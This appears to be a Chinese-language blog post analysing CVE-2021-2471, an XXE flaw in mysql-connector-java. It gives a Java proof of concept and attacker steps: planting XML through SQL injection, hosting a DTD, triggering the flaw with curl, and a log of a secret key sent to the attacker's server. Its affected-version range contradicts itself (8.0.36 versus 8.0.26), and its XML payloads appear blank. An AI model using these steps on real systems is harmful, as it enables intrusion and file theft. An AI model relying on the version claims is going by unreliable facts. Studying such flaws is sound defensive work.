MySQL CVE-2021-2471 XXE POC 分析

零、影响范围

1
2

infected: mysql-connector-java <= 8.0.36
fixed: mysql-connector-java > 8.0.37

漏洞分析参见：https://mp.weixin.qq.com/s/erIFMiPNB2XSBJSqXyxuKg

一、非现实世界的POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

private static final String connection_url = "jdbc:mysql://192.168.64.137:3306/sqlxmltest";
private static final String connection_user = "root";
private static final String connection_pass = "root";
private static final String poc = "" +
"" +
"]>" +
"&xxe;";

public static void poc() throws Exception {
Connection connection = DriverManager.getConnection(connection_url, connection_user,connection_pass);
SQLXML sqlxml = connection.createSQLXML();
sqlxml.setString(poc);
sqlxml.getSource(DOMSource.class);
}

二、现实世界的POC

1、[准备工作] 建表

MySQL 中没有 SQLXML 类型，建表的时候选择字符串类型即可。

1
2
3
4

create table RSS_FEEDS
(RSS_NAME varchar(32) NOT NULL,
RSS_FEED_XML longtext NOT NULL,
PRIMARY KEY (RSS_NAME));

2、[准备工作] 初始化表数据

1
2
3

INSERT INTO `sqlxmltest`.`RSS_FEEDS` (`RSS_NAME`, `RSS_FEED_XML`)
VALUES ('NORMAL',
'\r\n\r\n <constant name=\"struts.i18n.encoding\" value=\"gb2312\">324\r\n <package name=\"stuts2\" extends=\"struts-default\">\r\n <action name=\"login\" class=\"ActionUnit.Person\">\r\n <result name=\"s\">1_1.jsp\r\n <result name=\"t\">1_2.jsp\r\n <result name=\"m\">1_3.jsp\r\n <result name=\"fail\">1_4.jsp\r\n \r\n <action name=\"modifyPassword\" class=\"student.ModifyPassword\">\r\n <result name=\"success\">2_1.jsp\r\n <result name=\"fail\">2_2.jsp\r\n \r\n <action name=\"studentquery\" class=\"student.QueryScore\">\r\n <result name=\"success\">3_1.jsp\r\n <result name=\"false\">3_2.jsp\r\n \r\n <action name=\"infoquery\" class=\"student.QueryInfo\">\r\n <result name=\"success\">4_1.jsp\r\n <result name=\"false\">4_2.jsp\r\n \r\n \r\n');

3、[准备工作] 读表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

@RequestMapping(value = "/get/{rss_name}")
public String get_sql_xml(@PathVariable("rss_name") String rss_name) throws Exception {
Connection con = DriverManager.getConnection(connection_url, connection_user,connection_pass);

String selectRowQuery =  
    "select RSS\_NAME, RSS\_FEED\_XML " +  
    "from RSS\_FEEDS " +  
    "WHERE RSS\_NAME = ?";  
PreparedStatement selectRow = con.prepareStatement(selectRowQuery);  
selectRow.setString(1, rss\_name);  
ResultSet resultSet = selectRow.executeQuery();  
resultSet.next();  
SQLXML sqlxml = resultSet.getSQLXML(2);  
DOMSource domSource = sqlxml.getSource(DOMSource.class);  
return domSource.getNode().getNodeName();  

}

4、[攻击者] 通过SQL注入或者数据库访问来修改数据

1
2
3

INSERT INTO `sqlxmltest`.`RSS_FEEDS` (`RSS_NAME`, `RSS_FEED_XML`)
VALUES ('READFILE',
'&xxe;');

5、[攻击者] 准备 dtd 文件

1
2
3

">

%all;

6、[攻击者] 启动 web server

1

python -m SimpleHTTPServer 8041

7、攻击者触发漏洞

1

curl -vv 'http://192.168.64.137:8080/get/READFILE'

8、攻击者的 web server收到 dtd 下载请求和 key 文件读取成功的报文

1
2
3
4
5
6

$ python -m SimpleHTTPServer 8041 1 ⨯
Serving HTTP on 0.0.0.0 port 8041 ...

192.168.64.137 - - [23/Oct/2021 13:00:59] "GET /xxe.dtd HTTP/1.1" 200 -
192.168.64.137 - - [23/Oct/2021 13:00:59] "GET /?key=3c0bac92-977a-4cb5-afa7-32b2e83605bf HTTP/1.1" 200 -

三、漏洞查找关键点

1

mysql-connector-java-8.0.26.jar or lower version

1
2

SQLXML sqlxml = resultSet.getSQLXML(2);
DOMSource domSource = sqlxml.getSource(DOMSource.class);